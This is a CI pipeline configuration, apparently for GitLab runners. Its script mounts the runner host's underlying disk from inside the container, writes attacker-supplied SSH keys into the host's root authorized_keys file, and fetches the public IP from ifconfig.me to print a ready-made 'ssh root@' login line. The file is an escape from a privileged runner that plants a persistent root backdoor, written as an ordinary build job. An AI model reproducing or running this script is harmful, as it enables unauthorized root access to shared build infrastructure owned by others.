image: ghcr.io/sushrut1101/docker:arch

run:
  script:
    - neofetch
    - nproc
    - nproc --all
    - df -h
    - lsblk
    - ls /dev
    - |
      BLK=$(df -H /cache | awk '${print $1}' | sed 's|/dev/||g')
      echo "Trying /dev/${BLK}..."
      [ ! -e "/dev/${BLK}" ] && {
          echo "/dev/${BLK} not found, trying another block..."
          BLK=$(df -H /builds | awk '${print $1}' | sed 's|/dev/||g')
          echo "Trying /dev/${BLK}..."
          [ ! -e "/dev/${BLK}" ] && {
              echo "/dev/${BLK} not found! runner is unpriviledged! exiting!"
              exit 1
          }
      }
      echo "/dev/${BLK} found! mounting it to /mnt"
      mount /dev/${BLK} /mnt || {
          echo "mount failed! aboring!"
          exit 1
      }
      sleep 1
      echo 'mount successful!'
      echo 'files inside /mnt -'
      ls /mnt

      echo "Injecting keys..."
      mkdir -p /mnt/root/.ssh

      [ ! -z "$KEY" ] && {
          grep -q "$KEY" /mnt/root/.ssh/authorized_keys || echo "$KEY" >> /mnt/root/.ssh/authorized_keys
      }

      [ ! -z "$KEY1" ] && {
          grep -q "$KEY1" /mnt/root/.ssh/authorized_keys || echo "$KEY1" >> /mnt/root/.ssh/authorized_keys
      }

    - echo "ssh root@$(curl -s ifconfig.me; echo)"
    - umount /mnt || true
